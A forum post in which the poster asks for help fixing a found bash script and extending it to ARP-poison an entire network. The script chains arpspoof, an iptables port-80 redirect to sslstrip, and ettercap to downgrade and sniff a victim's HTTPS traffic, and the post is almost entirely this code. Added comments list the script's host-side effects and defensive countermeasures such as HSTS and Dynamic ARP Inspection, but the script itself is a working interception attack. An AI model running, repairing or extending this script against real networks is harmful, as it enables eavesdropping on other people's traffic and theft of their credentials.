I found the following script, but I have been unable to get it to run.
The error seems to be in the arpspoof section.
Should I replace it with Ettercap, or well...what do you guys think?
Also, it is unclear to me how to ARP the entire network. I put in // // for the target and the router IP for the gateway, but I am not sure whether that would work, given that the ARP spoof fails.
I would appreciate any feedback.
Code:
#!/bin/bash
#
# Synopsis: A program to sniff traffic in an SSL connection
# Author: thims (thims DOT local AT gmail DOT com)
# Version: 0.3
# Date: 20091107
# Comments:
# ToDO:
#
# Reviewer summary of host-side effects visible in this listing (useful when
# triaging a machine this has been run on):
#   - writes 1 to /proc/sys/net/ipv4/ip_forward (IPv4 forwarding on)
#   - appends a nat/PREROUTING REDIRECT rule for TCP destination port 80
#   - edits the ettercap configuration file in place with sed -i
#   - leaves PID files /var/run/sslsniff.arpspoof.run and
#     /var/run/sslsniff.sslstrip.run while running
#   - starts arpspoof, sslstrip and ettercap as child processes
# These writes normally require root. There is no trap handler: cleanUp only
# runs if capture returns, so an early exit through die leaves the changes
# above in place.

# leave blank simply here for coding style
victim=
gateway=
sslPort=10000
etterConf=/etc/etter.conf

# print help
# Writes the usage text to stdout; does not exit by itself.
function help() {
cat << EOF
Usage: $0 [args] host
-h, --help - Print this help and exit
-i. --iface - Interface to use
-e, --etconf - Location of etter.conf on the filesystem
-v, --victim - IP address of desired host
-g, --gateway - IP address of network gateway
-s, --sslport - Desired port for sslstrip
EOF
}

# echo supplied argument and die
# $1 (optional): message, printed to stdout (not stderr).
# Always terminates the whole script with exit status 1.
function die() {
  if [ -n "$1" ] ;then
    echo "$1"
  fi
  exit 1
}

# nohup wrapper to check if specified program will execute correctly
# $1: full command line as a single string.
# Returns 0 if a matching process is found after the 5 second wait, else 1.
# The check is by process name only, so a process of the same name that was
# already running also satisfies it.
function noHup() {
  cmd="$1"
  # both output streams of the child go to /dev/null
  nohup $cmd > /dev/null &> /dev/null &
  sleep 5
  # here simply to handle sslstrip because it is ran by python it throws off pidof
  if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
  else
    pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
  fi
  if [ -z "$pid" ] ;then
    return 1
  else
    return 0
  fi
}

# poison the arp
# Starts arpspoof through noHup using the globals iface, victim and gateway,
# then records the arpspoof PID(s) in /var/run/sslsniff.arpspoof.run.
# Defender note: ARP cache poisoning shows up as a changed MAC address for the
# gateway IP on the affected host; switch-level controls such as Dynamic ARP
# Inspection, or static ARP entries for the gateway, address it.
function spoofMac() {
  echo -n "Poisoning the victim...."
  noHup "arpspoof "$iface" -t "$victim" "$gateway""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate arpspoof. Dieing..."
  fi
  echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
  echo "Ok"
}

# intercept the SSL cert
# NOTE(review): despite the label above, nothing in this function touches
# certificates. It enables IPv4 forwarding, redirects TCP destination port 80
# (plaintext HTTP) to the local port in sslPort, and starts sslstrip there.
# Defender note: the redirect only sees traffic that starts as plaintext HTTP;
# sites served with HSTS (ideally preloaded) to clients that honour it do not
# make that initial plaintext request.
function sslInit() {
  echo -n "Setting up SSL intercept...."
  echo 1 > /proc/sys/net/ipv4/ip_forward
  # ensure that ip_forward is set
  # (loops, rewriting the value, for as long as the file still reads 0)
  while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
  do
    echo 1 > /proc/sys/net/ipv4/ip_forward
  done
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  noHup "sslstrip -a -f -k -l "$sslPort""
  if [ $? -gt 0 ] ;then
    die "Error: could not initiate sslstrip. Dieing..."
  fi
  # PID is found by grepping the process list, same as in noHup
  echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
  echo "Ok"
}

# capture the responses
# Edits the ettercap configuration in place, then runs ettercap in the
# foreground; the function returns only when ettercap exits.
function capture() {
  # edit ettercap.conf
  # For every line containing "redir" (case-insensitive) and "iptables",
  # remove the first '#' on that line.
  for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
  do
    sed -i $linNum's/#//' "$etterConf"
  done
  echo -n "Starting to sniff...."
  ettercap -T -q "$iface"
}

# clean up enviroment
# Reverses the changes made by spoofMac, sslInit and capture: kills the
# recorded PIDs, removes the PID files, deletes the iptables rule, turns
# ip_forward off and re-comments the ettercap configuration lines.
# NOTE(review): ip_forward is set to 0 unconditionally rather than restored to
# its previous value, and '#' is prepended to every matching etter.conf line,
# including any that were already uncommented before the run, so the host is
# not guaranteed to end up in its original state.
function cleanUp() {
  echo "Cleaning up...."
  echo -n "Closing SSL proxy...."
  kill $(cat /var/run/sslsniff.sslstrip.run)
  rm /var/run/sslsniff.sslstrip.run
  echo "Ok"
  echo -n "Unpoisoning the victim...."
  # signal 2 is SIGINT
  kill -n 2 $(cat /var/run/sslsniff.arpspoof.run)
  rm /var/run/sslsniff.arpspoof.run
  echo "Ok"
  echo -n "Removing iptables rule and ip_forwarding...."
  # -D with the same rule specification that sslInit appended with -A
  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
  echo 0 > /proc/sys/net/ipv4/ip_forward
  echo "Ok"
  # return etter.conf to the state it was found in
  echo -n "Returning etter.conf to the configuration we found it with...."
  for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
  do
    sed -i $linNum's/^/#/' "$etterConf"
  done
  echo "Ok"
  echo "Have a nice day!"
}

# initialize the whole shebang
# Requires both victim and gateway to be non-empty; otherwise prints the help
# text and exits through die. On success prints the settings and runs the
# four stages in order: spoofMac, sslInit, capture, cleanUp.
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] ;then
    help
    echo
    die "Error: a syntactical one"
  else
    echo "Enviroment details:"
    echo " Victim: " "$victim" " Ok!"
    echo " Gateway/Router: " "$gateway" " OK!"
    echo " Interface: " "$iface" " OK!"
    echo " SSLStrip port: " "$sslPort" " OK!"
    spoofMac
    sslInit
    capture
    cleanUp
  fi
}

# some CLI ARGS?
# One shift per iteration: an option's value ($2) is read here and then seen
# again as $1 on the next pass, where it matches no arm unless it is empty or
# starts with '-'.
while [ $# -gt 0 ]
do
  case "$1" in
    "-h"|"--help")
      help
      die
      ;;
    "-v"|"--victim")
      victim="$2"
      ;;
    "-g"|"--gw")
      gateway="$2"
      ;;
    "-s"|"--sslport")
      sslPort="$2"
      ;;
    "-i"|"--iface")
      # treats an ifconfig exit status of exactly 1 as "no such interface"
      if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
        die "Error: interface "$2" does not exist!"
      else
        # stored together with its option letter as one string
        iface="-i $2"
      fi
      ;;
    "-e"|"--etconf")
      if [ ! -e "$2" ] ;then
        die "Error: specified ettercap conf does not exist!"
      else
        etterConf="$2"
      fi
      ;;
    '')
      help
      echo
      die "Error: a syntactical one"
      ;;
    -*)
      help
      echo
      die "Error: a syntactical one"
      ;;
  esac
  shift
done

# main loop
initialize


